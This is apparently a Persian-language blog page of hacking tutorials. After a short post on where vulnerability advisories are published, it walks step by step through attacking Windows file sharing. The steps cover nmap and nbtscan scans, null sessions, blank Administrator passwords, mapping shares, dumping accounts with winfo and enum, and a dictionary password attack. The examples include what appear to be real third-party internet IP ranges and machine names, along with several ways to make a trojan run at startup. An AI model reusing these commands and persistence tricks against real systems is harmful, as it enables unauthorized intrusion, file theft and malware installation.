| تبليغات | X |
 |
 |
|
| نرم افزار |
|
Vulnerability Scanner چيست؟
|
|
+ نوشته شده در
جمعه سوم مهر 1388ساعت 3:39 قبل از ظهر به دست ابی |
|
|
Vulnerability چيست؟
A vulnerability was reported in ... برخورد کرده باشيد. اين بيان ميکنه که يه vul جديد کشف شده است. دقت کنيد که اين vul از وقتي نرمافزار طراحي شده با اون بوده ولي کسي از اون خبر نداشته تا وقتي که اين گزارش منتشر بشه! پس اين گروهها کارشون کشف باگ هستش نه اختراع باگ! http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxx http://cgi.nessus.org/cve.php3?cve=xxxxxxxxx که به جاي xxxxxxxxx بايد شماره CVE رو بنويسيد مثلا CVE-2000-0508 يا مثلا CAN-2002-0651 و... BID: 1806 از کجا بايد اونو خوند؟ (يعني لينک مستقيمش چي هست؟) همين پايين مهمترهاشو ميگم (دقت کنيد که همه اون اسمها معادل هم هستند فقط سايتهاي مختلف اسمهاي مختلفي را واسه يه vul انتخاب ميکنند و ما ميخواهيم تمام مطالب مرتبط با يه vul خاص رو از سايتهاي مختلف پيدا کنيم ) http://www.securityfocus.com/bid/xxxx که به جاي xxxx بايد يک عدد بنويسيد (همان عدد مربوز به BID ) مثلا به جاي xxxx بنويسيد: 1806 http://www.iss.net/security_center/search.php که وقتي در اين صفحه search کنيد، يک سري صفحات static بدست مياد که بايد بخونين. http://www.cert.org/advisories/xxxxxxxxx.html بهجاي xxxxxxxxx مثلا مينويسيم: CA-2002-19 http://www.kb.cert.org/vuls/id/xxxxxx ۵- و … |
|
+ نوشته شده در
جمعه سوم مهر 1388ساعت 3:38 قبل از ظهر به دست ابی |
|
|
Samba چيست؟
# nmap -sS -O 192.168.3.1-50 -p 139 و جواب ميشنوم: st 1 open and 1 closed TCP port Interesting ports on (192.168.3.2): Port State Service 139/tcp open netbios-ssn Remote OS guesses: Windows Millennium Edition (Me), Win 2000, بايد اينو بهتون بگم که من دارم اين کار رو روي Lan انجام ميدم و همه Ip ها Static هستند. ولي خب کار رو جوري در نظر ميگيرم که گويا نميدونم چه Host هاي اينجا وجود دارن :) 192.168.3.1 يک SuSE 8 هست که کار رو از طريقش انجام ميديم و 192.168.3.2 يک win2kpro sp2 هست که قربانيه و البته FireWall نداره :) من اينجا از آيپي هاي کلاس C استفاده ميکنم ممکنه وضع شما تو اينترنت فرق کنه، ولي خب نحوه کار تغيير نميکنه. حالا هدف رو پيدا کرديم، هدف ما 192.168.3.2 هست . # nmblookup –A 192.168.3.2 و جواب ميگيرم: Looking up status of 192.168.3.2
ARMINLAPTOP <00> - B < ACTIVE>
WORKGROUP <00> - < GROUP> B < ACTIVE>
ARMINLAPTOP <03> - B < ACTIVE>
ARMINLAPTOP <20> - B < ACTIVE>
WORKGROUP <1e> - < GROUP> B < ACTIVE>
ADMINISTRATOR <03> - B < ACTIVE>
WORKGROUP <1d> - B < ACTIVE>
..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>همه چيز مشخصه نه ؟ اسم کامپيوتر ARMINLAPTOP , گروه کامپيوتر WORKGROUP و کاربر فعال Administrator هست :) # smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2 نتيجه دستور به صورت زير است: added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
ADMIN$ Disk Remote Admin
C$ Disk Default share
Armin Disk
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOPخب ميبينيد ؟ :) هر دو پارتيشن ARMINLAPTOP در اختيار شماست ! :) همچنين کامپيوتر هايي که باهاش در ارتباط هستند رو هم ميبينيم. در اين مثال ملاحظه ميفرماييد که Armin به عنوان Disk بهاشتراک گذاشته شده. خب قبل از اينکه بريم سراغ بقيه کار يک بار هم Anonymous رو امتحان ميکنيم ( يه چيزي مثل Null Session ): # smbclient -LARMINLAPTOP -I 192.168.3.2 و جواب: added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOPخب باز هم يه اطلاعاتي پيدا ميکنيم ! :) با اينکه فايلهاي Share شده رو نميبينيم، به هر صورت از هيچي بهتره ! شايد يه جاي ديگه به درد بخوره ! # smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 و جواب ميشنوم: added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0 Password: session setup failed: NT_STATUS_LOGON_FAILURE خب ! :) Share توسط Password محافظت ميشه ! :) کار زيادي نميتونيم انجام بديم. مثلا ميتونيم همين Null پسورد رو امتحان کنم، ولي خب اگر با Win9x طرف باشيم کاري نميشه کرد . حالا رو ويندوز 2000 به بالا کار ميکنيم. روي اينکه کاربر ناشي باشه و پسورد Administrator رو خالي گذاشته باشه خيلي حساب کرديم : # smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator و جواب ميشنوم: added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0 Password: Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager] smb: > اين smb: > ls و جواب ميشنوم: . DA 0 Sat Feb 8 05:34:11 2003
.. DA 0 Sat Feb 8 05:34:11 2003
Blcorp D 0 Sat Feb 8 03:05:51 2003
47943 blocks of size 65536. 8261 blocks availableو ادامه ميدم به صورت زير: smb: > cd Blcorp
smb: Blcorp> ls
. D 0 Sat Feb 8 03:05:51 2003
.. D 0 Sat Feb 8 03:05:51 2003
WLTrial.exe A 2321412 Mon Apr 29 14:18:58 2002
47943 blocks of size 65536. 8261 blocks available
smb: Blcorp> get WLTrial.exe
getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...
smb: Blcorp>شما ميتونيد از دستور Pull براي فرستادن فايل و get براي گرفتن فايل استفاده کنيد :) فايلها گرفته شده در دايرکتوري فعلي شما ذخيره ميشوند . قسمت اميدوار کننده کار اينه که خيلي از مردم از ويندوز استفاده ميکنن و اکثرشون حتي نميدونن که همه فايل سيستم هاشون بدون پسورد به راحتي قابل دسترسه. خب ما هم اينهارو ياد نميگيريم که دور دنيا بچرخيم و فايلهاي مردم رو پاک کنيم ! C:>nbtstat -A 192.168.3.1
Local Area Connection 2:
Node IpAddress: [192.168.3.2] Scope Id: []
Host not found
- يک نفوذ بدون مشکل جدي چقدر طول ميکشه ؟ |
|
+ نوشته شده در
جمعه سوم مهر 1388ساعت 3:37 قبل از ظهر به دست ابی |
|
|
NetBIOS چيست؟
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29): Port State Service 139/tcp open netbios-ssn Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP اين خروجي اعلام ميکند که پورت ۱۳۹ باز است. پس ميشود از اين ip استفاده کرد. nbtstat -A 217.218.84.29 دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامترهاي بسياري است که اگه ميخواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.) NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
net view 217.218.84.29 حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته: System error 5 has occurred. Access is denied. اين يعني نميتونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري ميتونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوزهاي سري NT جواب ميده. مينويسيد: net use 217.218.84.29IPC$ "" /user:"" حالا چرا ميگن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد ميتونم دوباره دستور net view 217.218.84.29 را تکرار کنم. Shared resources at 217.218.84.29 Share name Type Used as Comment ------------------------------------------------ Printer Print Acrobat PDFWriter Printer2 Print Acrobat Distiller SharedDocs Disk The command completed successfully. عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مينويسم. net use L: 217.218.84.29SharedDocs به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط ميگيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب ميشنوم: The command completed successfully. معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که ميتونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ... net use /delete L: استفاده کنيد.
d: ewfolderali.exe در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد. [autorun] open=d: ewfolderali.exe ۳- اگه به فولدر ويندوز دسترسي داريد، ميتونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد. run=d: ewfolderali.exe ۵- اگه به فولدر ويندوز دسترسي داريد، ميتونيد تروجان رو به فولدر Start MenuStartup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست. enum -S 217.218.84.29 و جواب شنيدم: server: 217.218.84.29 setting up session... success. enumerating shares (pass 1)... got 10 shares, 0 left: E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer cleaning up... success. ملاحظه ميفرماييد که درايوهاي E و D و F و C و نيز SharedDocs و ... ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ). nbtscan -v -s : 195.219.49.0-30 که ليست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب ميشنوم: 195.219.49.1 Recvfrom failed: Connection reset by peer 195.219.49.5 Recvfrom failed: Connection reset by peer 195.219.49.6 Recvfrom failed: Connection reset by peer 195.219.49.7 Recvfrom failed: Connection reset by peer 195.219.49.8 Recvfrom failed: Connection reset by peer 195.219.49.12 Recvfrom failed: Connection reset by peer 195.219.49.23:MRS.ZADE :00U 195.219.49.23:ATINET_MRA :00G 195.219.49.23:MRS.ZADE :03U 195.219.49.23:MAC:44-45-53-54-00-00 195.219.49.28:MAC:44-45-53-54-00-00 195.219.49.26:KIYARASH-R96L0K:00U 195.219.49.26:KIYARASH-R96L0K:20U 195.219.49.26:WORKGROUP :00G 195.219.49.26:WORKGROUP :1eG 195.219.49.26:MAC:00-53-45-00-00-00 195.219.49.22:FARHANG-ZCT780D:00U 195.219.49.22:FARHANG-ZCT780D:20U 195.219.49.22:WORKGROUP :00G 195.219.49.22:WORKGROUP :1eG 195.219.49.22:MAC:00-53-45-00-00-00 195.219.49.29:TESSA :00U 195.219.49.29:WORKGROUP :00G 195.219.49.29:TESSA :03U 195.219.49.29:MAC:44-45-53-54-00-00 195.219.49.25:MAC:44-45-53-54-00-00 در مورد ip هايي که 20U را ميبينيد، يعني sharing رو ميشه استفاده کرد. winfo 195.219.49.184 -n -v و به نتايج زير رسيدم: Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default shareبعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها ميتونين، share ها رو ببينيد. enum -P xxx.xxx.xxx.xxx و جواب ميشنوم: server: xxx.xxx.xxx.xxx setting up session... success. password policy: min length: none min age: none max age: 42 days lockout threshold: none lockout duration: 30 mins lockout reset: 30 mins cleaning up... success. خودتون که دارين ميبينين! enum -D -f "theargon.lst" -u "Ali" xxx.xxx.xxx.xxx حالا enum مياد و تمام پسوردها رو تست ميکنه تا ايشالله به جواب برسه! |
||||||||||||
|
+ نوشته شده در
جمعه سوم مهر 1388ساعت 3:37 قبل از ظهر به دست ابی |
|
||||||||||||
